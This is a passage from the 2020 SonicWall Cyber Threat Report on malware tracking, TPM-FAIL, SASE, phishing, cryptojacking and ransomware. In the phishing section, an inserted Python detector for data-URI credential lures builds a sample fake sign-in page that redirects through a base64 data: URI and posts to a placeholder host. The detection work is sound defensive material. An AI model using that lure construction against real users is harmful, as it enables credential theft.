2020 SONICWALL CYBER THREAT REPORT

CONTENTS
A NOTE FROM BILL
CYBERCRIMINAL INC.
2019 GLOBAL CYBERATTACK TRENDS
INSIDE THE SONICWALL CAPTURE LABS THREAT NETWORK
KEY FINDINGS FROM 2019
SECURITY ADVANCES
CRIMINAL ADVANCES
FASTER IDENTIFICATION OF NEVER-BEFORE-SEEN MALWARE
TOP 10 CVES EXPLOITED IN 2019
ADVANCEMENTS IN DEEP MEMORY INSPECTION
MOMENTUM OF PERIMETER-LESS SECURITY
PHISHING DOWN FOR THIRD STRAIGHT YEAR
CRYPTOJACKING CRUMBLES
RANSOMWARE TARGETS STATE, PROVINCIAL & LOCAL GOVERNMENTS

malicious Office files were then leveraged later in the year.

ADVANCEMENTS IN DEEP MEMORY INSPECTION

Tracking the evolution of malware strains

The collective power of Capture ATP and RTDMI also helps SonicWall Capture Labs threat researchers track the evolution of malware variants even when authors obfuscate their payloads, such as using scripts inside of archives. In this example, SonicWall tracked the evolution of GandCrab as it spread in the wild. The authors of the GandCrab ransomware eventually announced they were shuttering the project in June 2019 after a “successful” 16-month run.

[Figure: GANDCRAB RANSOMWARE V5.X TIMELINE. 1-Jan-19 v5.0.4; 17-Jan-19 v5.1; 28-Jan-19 v5.1; 24-Feb-19 v5.1; 10-Mar-19 v5.2; 11-Mar-19 v5.2; 12-Mar-19 v5.2; 7-Apr-19 v5.2; 30-May-19 v5.2]

The timeline highlights changes SonicWall observed to GandCrab Version 5 in 2019, including alterations to payloads, malicious URLs, etc., even if the version number remained the same (i.e., Version 5.2 could have different download URLs). In this snapshot, SonicWall identified and logged different versions of GandCrab through the first half of the year, but didn't record any attacks after May 2019 as the malware authors terminated the illegal affiliate program.

Side-channel attacks continue to be ripe for security research

In November 2019, four researchers from three universities (Worcester Polytechnic Institute (U.S.), University of Lübeck (Germany) and the University of California (U.S.)) published new findings that side-channel timing and lattice attacks could be executed against Trusted Platform Module (TPM) chips, specifically Intel fTPM and STMicroelectronics TPM chips. Dubbed TPM-FAIL, this group of vulnerabilities is the next variation of side-channel attacks following Meltdown/Spectre, Foreshadow, PortSmash, MDS, etc. The details of the TPM-FAIL vulnerabilities are outlined in CVE-2019-11090.

The latest attacks on the TPM chip show an evolution of side-channel attacks. Unlike the first-generation side-channel threats that would result in damage to the “immediate” target (i.e., the targeted data centers, cloud providers, etc.), TPM-FAIL could impact unpatched devices
“down the line”: everything from security appliances to end-user laptops. This exploit could be leveraged to forge digital signatures. If an operating system or application uses the TPM to issue digital signatures, the private signing key used for signature generation can be compromised. With compromised signing keys, forged signatures can help criminals bypass authentication protocols, tamper with operating systems, sign malicious software, etc.

SonicWall stands by its position that while these types of side-channel attacks have yet to be publicly weaponized, they continue to present a significant potential threat to organizations, such as cloud providers and hosting companies, running virtualized or multi-tenant environments that allow execution of arbitrary payloads. SonicWall continues to test and refine detection techniques in preparation for when side-channel attacks evolve from
theoretical to practical. SonicWall has confirmed that Capture Advanced Threat Protection (ATP) sandbox customers are protected from certain TPM-FAIL side-channel attacks via the solution's patent-pending Real-Time Deep Memory Inspection™ (RTDMI) technology.

| Vulnerability | Publicly Announced | RTDMI Detection Confirmed |
|---|---|---|
| Meltdown | 1/3/2018 | 1/30/2018 |
| Spectre | 1/3/2018 | 6/13/2018 |
| Foreshadow | 8/14/2018 | 8/15/2018 |
| PortSmash | 11/2/2018 | 11/15/2018 |
| Spoiler | 3/5/2019 | 3/5/2019 |
| MDS (ZombieLoad, RIDL, Fallout) | 5/14/2019 | 5/15/2019 |
| TPM-FAIL (CVE-2019-11090) | 11/12/2019 | 1/7/2020 |

MOMENTUM OF PERIMETER-LESS SECURITY

For decades, protecting networks was entirely focused on defining perimeters and setting up defense layers to keep threats out. And for years, this approach served businesses well, with finite exposure points and attack vectors that were guarded with some investment and adherence to established
best practices and frameworks. Today, it's a different story. The boundaries of organizations' networks are borderless and expanding to limitless endpoints. Simultaneously, the threat landscape is becoming increasingly evasive. These evolving and persistent cyberattacks create boundless points of exposure to organizations. But new momentum toward perimeter-less architecture is helping redefine the future of cybersecurity: a safer future not restrained by undefendable perimeters.

Much of this new thinking was first based on a zero-trust security model, which requires organizations to verify and
authenticate any device, user or application, regardless of whether it is inside or outside the network perimeter. From there, organizations could segment data across different trust zones and further vet access depending on the sensitivity of the data. But more guidance was needed to bring this theory into reality.

Introduction of SASE

The cybersecurity and network security solution spaces are highly segmented with an endless number of offerings and vendors. This creates a massive headache for organizations trying to smoothly integrate these solutions into their network environment. Instead, the entire cybersecurity space needs to converge to provide a more holistic cybersecurity approach. This is where secure access service edge (SASE), a new network security model coined by Gartner in 2019, comes into play. SASE may help shape how organizations secure their networks and data in the coming years. SASE platforms combine software- and service-based networks, which will provide a unification of different security solutions.

“With an endless field of exposure points, the traditional network security model is outdated. With the adoption of many different cloud services, we need a more holistic
approach,” said Sagi Gidali, co-founder of Perimeter 81, a SonicWall technology partner. “Designing a new way forward, a future without network perimeters, was the only way to properly manage and mitigate tomorrow's most innovative cyberattacks.”

A modern SASE platform will empower organizations to simply connect to a single platform for access to a secure network while gaining access to physical and cloud resources, regardless of their location. Some of these new solutions have a range of overlapping benefits, so the naming conventions do vary: zero-trust network access, secure network as a service, firewall as a service, secure SD-WAN as a service and so on.

The new perimeter-less security movement could also replace the need for traditional virtual private networks (VPN) that so many employees have (begrudgingly) learned to adopt. Unlike hardware-based legacy VPN and firewall technology, the more advanced and secure zero-trust network as a service offerings use the software-defined perimeter (SDP) model to offer greater network visibility, seamless onboarding and full compatibility with all major cloud providers.

PHISHING DOWN FOR THIRD STRAIGHT YEAR

Mirroring how malware is being leveraged, cybercriminals are being more targeted with phishing than ever before, too. So much so, SonicWall Capture Labs threat researchers recorded a 42% decline in overall phishing volume, the third straight year the attack vector declined. Also like malware, volume is only part of the story. Phishers
are being measured, pragmatic and patient. Besides the usual phishing campaigns that attempt to steal login credentials, SonicWall observed new practices using old tricks. One such example is the use of HTML files leveraging legacy data uniform resource identifier (URI) methods other than JavaScript, which upon rendering displays a fraudulent webpage or form to the victim to illegally obtain usernames and/or passwords from unsuspecting victims. Employees across a range of organizations, including educational, banking, computer, government, airlines, agriculture, travel, machinery and construction, among others, are often the target of this prevalent phishing tactic.

As was covered in a previous section, PDFs and Microsoft Office files are the delivery vehicles of choice for the modern cybercriminal. Unfortunately, these files are universally trusted and abundant in the modern workplace. Threat actors are hoping this trust, coupled with busy work schedules, is enough to trick unsuspecting victims into clicking links or downloading attachments included within phishing emails. In many situations, this click is the only barrier preventing the delivery of the cybercriminal's payload.
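As an added example (not code from the SonicWall report, nor a SonicWall tool), the check below shows how a mail gateway or attachment sandbox can triage the data-URI lure just described: it parses an HTML attachment with Python's standard-library `html.parser`, decodes any `data:` URI reachable from a link, frame, image or `<meta http-equiv="refresh">` redirect, recurses into decoded HTML, and flags the case where a document reachable only through a `data:` URI asks for a password. The two sample attachments and the host names `collector.example` and `intranet.example` are constructed for this example.

```python
import base64
import re
import urllib.parse
from html.parser import HTMLParser

# data:[<mediatype>][;base64],<data>   (RFC 2397 syntax)
DATA_URI_RE = re.compile(r"^\s*data:([^,]*?)(;base64)?,(.*)$", re.IGNORECASE | re.DOTALL)


class _AttrCollector(HTMLParser):
    """Collect attribute values that can carry a navigable URI, and note
    password fields and form targets, from one HTML document."""
    URI_ATTRS = {"href", "src", "action", "data", "content"}

    def __init__(self):
        super().__init__()
        self.uris = []            # (tag, attribute, value)
        self.password_inputs = 0
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name, value in attrs.items():
            if name in self.URI_ATTRS and value:
                self.uris.append((tag, name, value))
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_inputs += 1
        if tag == "form" and attrs.get("action"):
            self.form_actions.append(attrs["action"])


def decode_data_uri(uri):
    """Return (media_type, decoded_text) for a data: URI, or None if uri is not one."""
    m = DATA_URI_RE.match(uri)
    if m is None:
        return None
    media = m.group(1).split(";")[0].lower() or "text/plain"
    data = m.group(3).strip()
    try:
        if m.group(2):  # ;base64 flag present
            raw = base64.b64decode(data + "=" * (-len(data) % 4))
        else:
            raw = urllib.parse.unquote_to_bytes(data)
    except ValueError:
        raw = b""       # malformed payload: still report the URI, with an empty body
    return media, raw.decode("utf-8", errors="replace")


def analyze_html(html_text, depth=0, max_depth=2):
    """Walk one HTML document, decode every data: URI it points at and recurse
    into decoded HTML. Returns a list of findings tagged with their nesting depth."""
    findings = []
    parser = _AttrCollector()
    parser.feed(html_text)
    parser.close()
    if parser.password_inputs:
        findings.append({"depth": depth, "kind": "password_form",
                         "detail": "%d password input(s), form action(s): %s"
                                   % (parser.password_inputs, parser.form_actions)})
    for tag, attr, value in parser.uris:
        if attr == "content":
            # <meta http-equiv="refresh" content="0;url=..."> keeps its target after "url="
            pos = value.lower().find("url=")
            if pos < 0:
                continue
            value = value[pos + 4:].strip().strip("'\"")
        decoded = decode_data_uri(value)
        if decoded is None:
            continue                     # ordinary http(s) or relative reference
        media, body = decoded
        findings.append({"depth": depth, "kind": "data_uri",
                         "detail": "<%s %s> carries %s (%d chars)" % (tag, attr, media, len(body))})
        if media in ("text/html", "application/xhtml+xml") and depth < max_depth:
            findings.extend(analyze_html(body, depth + 1, max_depth))
    return findings


def is_credential_lure(findings):
    """The pattern from the report: a document reached only through a data: URI
    that asks for a password. Plain inline images or fonts do not trigger this."""
    return any(f["kind"] == "data_uri" for f in findings) and \
        any(f["kind"] == "password_form" and f["depth"] > 0 for f in findings)


# Constructed sample lure: the outer attachment only redirects into a base64 data: URI
# whose decoded body is a fake sign-in form posting to a placeholder collector host.
_INNER_FORM = ('<html><body><h3>Session expired, please sign in</h3>'
               '<form action="https://collector.example/login" method="post">'
               'Email <input name="u"><br>Password <input type="password" name="p">'
               '<input type="submit" value="Sign in"></form></body></html>')
SAMPLE_LURE = ('<html><head><meta http-equiv="refresh" content="0;url=data:text/html;base64,'
               + base64.b64encode(_INNER_FORM.encode()).decode()
               + '"></head><body>Loading your document...</body></html>')

# Constructed benign attachment: a normal link plus an inline image, no form at all.
SAMPLE_BENIGN = ('<html><body><a href="https://intranet.example/report.pdf">Open report</a>'
                 '<img src="data:image/png;base64,iVBORw0KGgo="></body></html>')

if __name__ == "__main__":
    for name, doc in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        results = analyze_html(doc)
        print(name, "->", "SUSPICIOUS" if is_credential_lure(results) else "clean")
        for f in results:
            print("  depth %d %-14s %s" % (f["depth"], f["kind"], f["detail"]))
```

The decoder deliberately tolerates missing padding and stray characters, since lures are often hand-edited, and the benign sample shows why the rule keys on a password form inside decoded HTML rather than on the mere presence of a `data:` URI: inline images and fonts are legitimate everywhere in HTML mail.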
[Figure: Old tricks are new again. The example, found in 2019, shows how data URI methods can be leveraged to present target victims with fraudulent web pages or forms to steal user credentials.]

CRYPTOJACKING CRUMBLES

The shuttering of the Coinhive mining operation in March 2019 dealt a devastating blow to the nefarious cryptojacking racket that abused the service. Coinhive was not inherently malicious; it was an alternative method for websites to earn revenue instead of showing advertisements. Coinhive-enabled websites allocated a small portion of visitors' processing power to legitimately mine
cryptocurrency. Unfortunately, attackers misused this technology by infecting a large number of websites with Coinhive scripts and used the processing power of unsuspecting victims to mine cryptocurrency for themselves (without users' knowledge). The cryptocurrency of choice was usually Monero. While the ebb and flow of cryptocurrency prices didn't help encourage authors to write new cryptojacking malware, the loss of Coinhive was too much for the malicious movement to overcome. In fact, bitcoin even made a surge halfway through 2019 to help cryptojacking stay relevant as a lucrative option for cybercriminals.

After the shuttering of Coinhive, the volume of cryptojacking hits dropped 78% during the second half of 2019.

But crypto prices slumped again in late 2019 and remnant Coinhive malware faded with it. XMRig and Bitminer were the primary cryptojacking malware remaining, but their collective volume was a fraction of Coinhive. To put the decline in perspective, SonicWall reported that total cryptojacking hits reached 52.5 million for the first six months of 2019. Despite a late surge in December (expected seasonal attack spike), the malware finished with 64.1 million total hits in 2019, a 78% drop since the start of July 2019.

RANSOMWARE TARGETS STATE, PROVINCIAL & LOCAL GOVERNMENTS

In 2019, there was an increase in ransomware used in targeted attacks toward state, provincial and local governments, as well as large corporations. Attacks have ranged from hospitals, police stations and educational institutions to aluminum factories (Norsk Hydro, Norway) and power grids (City Power, Johannesburg). “In a modern, citizen-centric environment, successful ransomware attacks are highly disruptive,” SonicWall President and CEO Bill Conner wrote for Forbes. “Networks from city hall, law enforcement agencies, sanitation, courthouses or the DMV could be compromised in minutes and everyday operations held for ransom, often at exorbitant costs.” Following the same trend as global malware volume, ransomware attacks were down slightly in 2019.
SonicWall Capture Labs threat researchers recorded 187.9 million in total ransomware volume for the year, a 6% drop from the record-breaking 2018 volume.

Schools under siege by ransomware

K-12 districts and higher education institutions across the world were also targeted with ransomware in 2019. And it's very much a global epidemic. In the U.S., ransomware attacks took down schools across the country, from New York, New Jersey, Louisiana and Oklahoma to California and back again. In some cases, like Livingston Public Schools in New Jersey, classes were delayed because of ransomware infection. That attack even took down the district's payroll system. Similar delays were felt by districts in Michigan, Alabama and New York.

In the U.K., penetration testing conducted by JISC, the government agency that provides many computerized services to U.K. academic bodies, tested the defenses of over 50 British universities. The results were unflattering: the pen testers scored a 100% success rate, gaining access to every single system they tested. Defense systems were bypassed in as little as an hour in some cases, with the ethical hackers easily able to gain access to information such as research data, financial systems as well as staff and student personal information.

But volume shouldn't be confused with effectiveness. Cybercriminal organizations that leverage ransomware continue to focus
on the quality of their attacks over sheer quantity. It's no longer the size of the organization, but rather their likelihood to pay. Unfortunately, in 2019 that meant a number of high-profile attacks against various state, provincial and local governments. More than 140 state and local governments are reported to have been hit with ransomware in 2019, although the actual number is likely much higher. Another study stated that ransomware infected some 621 schools and hospitals through September 2019. The year saw ransomware attacks across the U.S. bring city services to a halt, including those in Arizona, Florida, Georgia, Indiana, Maryland, Nevada, New York, Texas and more. Larger organizations remain the most lucrative targets as they are more likely to pay higher sums of money for data restoration compared to the average end-user. Bitcoin remains the dominant currency for ransom payments because of its anonymity (when used correctly).

In Australia, the head of the local intelligence agency was recruited to inform universities about